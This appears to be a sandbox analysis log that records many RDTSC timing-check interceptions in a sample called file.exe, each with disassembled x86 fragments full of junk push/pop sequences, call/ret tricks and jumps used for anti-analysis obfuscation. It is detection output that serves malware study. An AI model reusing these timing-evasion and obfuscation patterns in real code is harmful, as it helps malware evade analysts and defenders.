Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C9B76 second address: 2C9BE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D35ACh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov di, 39F2h 0x0000001e add edi, 72ACCB4Ah 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b mov dword ptr [ebp+122D35E7h], edi 0x00000031 mov eax, dword ptr [ebp+122D1741h] 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007FA93D08FA18h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 movsx edi, bx 0x00000054 push FFFFFFFFh 0x00000056 mov ebx, dword ptr [ebp+122D3A21h] 0x0000005c push eax 0x0000005d push esi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C9BE4 second address: 2C9BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CBABF second address: 2CBAC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CEC44 second address: 2CEC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93CFE6D5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF1BA second address: 2CF1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF1BE second address: 2CF1C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF1C4 second address: 2CF1E3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA93D08FA25h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D11DB second address: 2D11EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D11EB second address: 2D11F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA93D08FA16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D03D9 second address: 2D03F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FA93CFE6D5Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D11F5 second address: 2D1241 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12457ED4h], ecx 0x00000011 push 00000000h 0x00000013 mov edi, edx 0x00000015 push 00000000h 0x00000017 jmp 00007FA93D08FA23h 0x0000001c xchg eax, esi 0x0000001d jnl 00007FA93D08FA22h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jne 00007FA93D08FA1Ch 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D212D second address: 2D2132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DAE76 second address: 2DAE92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA93D08FA26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DAE92 second address: 2DAE97 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DB021 second address: 2DB039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA93D08FA1Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DB35A second address: 2DB366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007FA93CFE6D56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFADB second address: 2DFAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93D08FA1Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFB8D second address: 2DFB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FA93CFE6D56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFC54 second address: 2DFC58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFC58 second address: 2DFC5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFC5C second address: 2DFC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFC62 second address: 2DFC82 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA93CFE6D5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FA93CFE6D5Ch 0x00000014 js 00007FA93CFE6D56h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFD37 second address: 2DFD42 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFD42 second address: 2DFD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFD4E second address: 2DFDB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f jbe 00007FA93D08FA23h 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007FA93D08FA25h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA93D08FA1Fh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFDB1 second address: 2DFDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E5C9C second address: 2E5CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E5CA7 second address: 2E5CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E5CAB second address: 2E5CCA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007FA93D08FA16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FA93D08FA1Eh 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E52CD second address: 2E52D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E56EC second address: 2E56F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA93D08FA16h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E56F8 second address: 2E5717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnc 00007FA93CFE6D56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EB1DA second address: 2EB1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FA93D08FA1Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EB1F2 second address: 2EB1F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EB1F8 second address: 2EB1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EB1FC second address: 2EB219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D60h 0x00000007 jg 00007FA93CFE6D56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EB219 second address: 2EB220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E9E50 second address: 2E9E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E9E54 second address: 2E9E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EAB8E second address: 2EAB97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EDF0E second address: 2EDF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EDF12 second address: 2EDF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93CFE6D65h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EDF30 second address: 2EDF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA93D08FA16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EDF3C second address: 2EDF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2813D8 second address: 2813E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F38B9 second address: 2F38BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F38BF second address: 2F38C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F38C9 second address: 2F38CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F38CF second address: 2F38D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F2316 second address: 2F231A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F231A second address: 2F231E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F231E second address: 2F2340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93CFE6D5Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA93CFE6D5Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F2687 second address: 2F268B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F268B second address: 2F268F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F268F second address: 2F26BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93D08FA24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FA93D08FA29h 0x00000011 jmp 00007FA93D08FA1Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F2809 second address: 2F2815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA93CFE6D56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F2815 second address: 2F2829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FA93D08FA1Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F2B49 second address: 2F2B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F2CC9 second address: 2F2CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29F48B second address: 29F4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA93CFE6D58h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jl 00007FA93CFE6D6Eh 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2704CA second address: 270522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA93D08FA16h 0x0000000a popad 0x0000000b jmp 00007FA93D08FA29h 0x00000010 pushad 0x00000011 jno 00007FA93D08FA16h 0x00000017 jnc 00007FA93D08FA16h 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA93D08FA1Ah 0x00000029 jmp 00007FA93D08FA26h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F3731 second address: 2F3735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F3735 second address: 2F375D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA93D08FA1Fh 0x00000008 jne 00007FA93D08FA16h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jo 00007FA93D08FA16h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F375D second address: 2F3775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA93CFE6D63h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F3775 second address: 2F377F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA93D08FA16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F1EA1 second address: 2F1EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FA93CFE6D56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FC38A second address: 2FC38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FB21F second address: 2FB234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FB234 second address: 2FB23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA93D08FA16h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7634 second address: 29E94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA93CFE6D68h 0x0000000f pop edx 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FA93CFE6D58h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jmp 00007FA93CFE6D5Dh 0x00000030 lea eax, dword ptr [ebp+124823DAh] 0x00000036 mov dword ptr [ebp+122D198Fh], ecx 0x0000003c push eax 0x0000003d jmp 00007FA93CFE6D66h 0x00000042 mov dword ptr [esp], eax 0x00000045 mov ecx, dword ptr [ebp+12452676h] 0x0000004b call dword ptr [ebp+122D30C1h] 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edi 0x00000055 pop edi 0x00000056 pushad 0x00000057 popad 0x00000058 pop eax 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7C4B second address: 2B7C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7C51 second address: 108B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007FA93CFE6D58h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 mov edx, dword ptr [ebp+122D1807h] 0x00000026 push dword ptr [ebp+122D0611h] 0x0000002c call dword ptr [ebp+122D17F7h] 0x00000032 pushad 0x00000033 jmp 00007FA93CFE6D63h 0x00000038 xor eax, eax 0x0000003a stc 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f jbe 00007FA93CFE6D5Dh 0x00000045 jmp 00007FA93CFE6D67h 0x0000004a mov dword ptr [ebp+122D37B1h], eax 0x00000050 or dword ptr [ebp+122D3066h], ebx 0x00000056 mov esi, 0000003Ch 0x0000005b pushad 0x0000005c jno 00007FA93CFE6D5Ch 0x00000062 sub dword ptr [ebp+122D3066h], edx 0x00000068 popad 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d pushad 0x0000006e clc 0x0000006f popad 0x00000070 lodsw 0x00000072 mov dword ptr [ebp+122D3101h], edx 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c xor dword ptr [ebp+122D24F5h], ecx 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 cmc 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a jmp 00007FA93CFE6D61h 0x0000008f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7CCD second address: 2B7CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7CD3 second address: 2B7CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA93CFE6D66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7F5F second address: 2B7F64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7F64 second address: 2B7F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B8103 second address: 2B8109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B8109 second address: 2B810D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B810D second address: 2B8156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FA93D08FA18h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D2518h], eax 0x0000002b push 00000004h 0x0000002d nop 0x0000002e jmp 00007FA93D08FA1Ch 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FA93D08FA1Ah 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B87B3 second address: 2B87BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B87BE second address: 2B87C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B87C2 second address: 2B87D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B87D2 second address: 2B87F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B88EF second address: 2B8932 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA93CFE6D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jnc 00007FA93CFE6D5Ah 0x00000012 nop 0x00000013 mov ecx, eax 0x00000015 lea eax, dword ptr [ebp+1248241Eh] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FA93CFE6D58h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 nop 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
